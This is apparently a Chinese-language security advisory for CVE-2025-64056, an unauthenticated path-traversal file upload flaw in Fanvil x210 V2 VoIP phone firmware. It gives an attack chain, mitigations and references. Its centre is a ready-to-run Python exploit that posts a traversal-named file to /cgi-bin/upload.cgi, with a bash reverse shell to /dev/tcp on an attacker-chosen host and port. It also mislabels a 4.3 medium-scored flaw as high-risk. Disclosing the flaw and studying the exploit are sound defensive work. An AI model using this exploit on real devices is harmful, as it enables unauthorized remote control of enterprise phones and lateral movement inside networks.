CVE-2025-64056 Fanvil x210 V2 固件文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-64056

漏洞类型

文件上传

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fanvil x210 V2

漏洞概述

CVE-2025-64056是发生在Fanvil x210 V2 VoIP电话设备固件版本2.12.20中的一个高危安全漏洞。该漏洞属于文件上传漏洞类别，存在于设备的Web管理界面或固件更新功能中。攻击者可以利用此漏洞，在无需任何认证的情况下，通过本地网络向目标设备的文件系统上传任意文件。

Fanvil x210 V2是一款广泛应用于企业通信环境的IP电话设备，其Web管理界面提供了配置管理、固件升级等功能。由于设备在处理文件上传请求时缺乏充分的输入验证和权限检查，攻击者可以构造恶意请求绕过安全限制，将文件写入设备的关键目录中。

此漏洞的危险性在于其攻击门槛较低，无需认证即可利用，且攻击者位于同一本地网络即可发起攻击。一旦攻击成功，攻击者可以上传恶意脚本、配置文件甚至完整的恶意固件，从而实现持久化控制、执行任意命令、窃取敏感信息或对设备进行进一步的攻击利用。在企业网络环境中，如果该设备与其他关键系统存在信任关系，攻击者还可能利用被入侵的IP电话作为跳板，对内网其他设备发起横向攻击。

该漏洞的CVSS评分为4.3，属于中等严重程度，主要因为其攻击复杂度较低（AC:L），但机密性和完整性影响均为低级别（C:L/I:L）。然而在实际攻击场景中，攻击者通过文件上传漏洞往往可以进一步提升权限，因此该漏洞的实际危害可能被低估。建议受影响的用户尽快采取修复措施。

技术细节

该文件上传漏洞存在于Fanvil x210 V2设备的固件处理逻辑中，具体位于Web服务组件处理用户上传文件的模块。漏洞的根本原因在于服务器端缺乏对上传文件类型、内容和目标路径的有效验证机制。

漏洞利用过程如下：攻击者首先构造一个HTTP POST请求，目标是设备上存在文件上传功能的端点（通常为固件升级接口或配置备份恢复接口）。请求中包含精心构造的文件数据，攻击者可以将文件名设置为路径遍历序列（如../），以突破默认的上传目录限制，将文件写入任意位置。

更关键的是，设备在接收上传请求时未检查用户是否已认证。攻击者可以直接发送请求而无需提供任何认证凭据（PR:N），这大大降低了攻击难度。攻击者可以上传包含恶意代码的文件，如PHP脚本、Shell脚本或编译后的可执行文件，然后通过其他接口触发执行。

在某些情况下，攻击者还可以利用固件更新功能上传修改过的固件文件。如果设备的签名验证机制存在缺陷或被绕过，攻击者可以植入后门固件，实现对设备的长期控制。由于设备在企业网络中通常具有较高的网络权限，攻击者还可以利用被入侵的设备作为内网渗透的跳板。

受影响版本为Fanvil x210 V2固件版本2.12.20。攻击向量为相邻网络（AV:A），意味着攻击者需要能够访问到目标设备所在的网络广播域。

攻击链分析

STEP 1

1

信息收集：攻击者首先扫描本地网络，发现运行Fanvil x210 V2固件版本2.12.20的IP电话设备

STEP 2

2

识别攻击面：确认目标设备Web管理界面可访问，定位存在文件上传功能的CGI接口

STEP 3

3

构造恶意请求：攻击者构造包含路径遍历序列的HTTP POST请求，将恶意文件伪装为正常上传请求

STEP 4

4

发送恶意载荷：无需任何认证，直接发送构造好的文件上传请求，设备缺乏验证直接接收并保存文件

STEP 5

5

权限提升：利用上传的恶意脚本或通过其他接口触发执行，获得设备命令执行权限

STEP 6

6

持久化控制：植入后门或修改配置，实现长期控制；或利用设备作为跳板进行内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-64056 PoC - Fanvil x210 V2 File Upload Vulnerability
Target: Fanvil x210 V2 with firmware <= 2.12.20
Usage: python3 cve-2025-64056.py <target_ip>
"""

import requests
import sys
import argparse

def exploit_file_upload(target_ip, lhost=None, lport=4444):
    """
    Exploit the unauthenticated file upload vulnerability in Fanvil x210 V2
    """
    # Target URL - typically the web management interface upload endpoint
    url = f"http://{target_ip}/cgi-bin/upload.cgi"
    
    # Prepare malicious payload - reverse shell script
    if lhost:
        payload = f"#!/bin/bash\n/bin/bash -i > /dev/tcp/{lhost}/{lport} 0>&1"
    else:
        payload = "#!/bin/bash\necho 'VULNERABLE' > /tmp/pwned.txt"
    
    # Construct multipart form data with path traversal
    files = {
        'file': ('../../../../../tmp/shell.sh', payload, 'application/octet-stream'),
        'filename': (None, 'test.txt', None)
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Accept': '*/*'
    }
    
    print(f"[*] Target: {target_ip}")
    print(f"[*] Exploiting file upload vulnerability...")
    
    try:
        response = requests.post(url, files=files, headers=headers, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] File upload appears successful!")
            print("[+] Check if shell.sh exists at /tmp/shell.sh")
            return True
        else:
            print(f"[-] Upload failed with status {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

def check_vulnerability(target_ip):
    """
    Check if target is vulnerable by probing the upload endpoint
    """
    url = f"http://{target_ip}/cgi-bin/upload.cgi"
    
    try:
        response = requests.get(url, timeout=5)
        print(f"[*] Target responds to HTTP requests")
        print(f"[*] Status: {response.status_code}")
        return True
    except:
        print("[-] Target does not respond")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-64056 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('--lhost', help='Local host for reverse shell')
    parser.add_argument('--lport', default=4444, help='Local port for reverse shell')
    args = parser.parse_args()
    
    print("=" * 60)
    print("CVE-2025-64056 - Fanvil x210 V2 File Upload")
    print("=" * 60)
    
    if check_vulnerability(args.target):
        exploit_file_upload(args.target, args.lhost, args.lport)

影响范围

Fanvil x210 V2 固件 2.12.20 及之前版本

防御指南

临时缓解措施

在厂商发布正式修复版本之前，建议采取以下临时缓解措施：1) 在网络边界防火墙上阻止非授权用户访问IP电话设备的Web管理接口；2) 启用设备本地访问控制列表（ACL），限制只有可信IP地址可以访问管理功能；3) 禁用不必要的远程管理协议，改用本地控制台管理；4) 监控设备日志，关注异常的文件上传和配置变更行为；5) 考虑在企业网络中实施网络微隔离策略，将VoIP设备与其他关键业务系统隔离；6) 如果业务允许，可暂时关闭设备的网络管理功能，仅通过本地串口进行配置管理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64056
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64056
3 Details https://www.cvedetails.com/cve/CVE-2025-64056/
4 VulDB https://vuldb.com/cve/CVE-2025-64056
5 Link http://fanvil.com
6 Link https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64056.md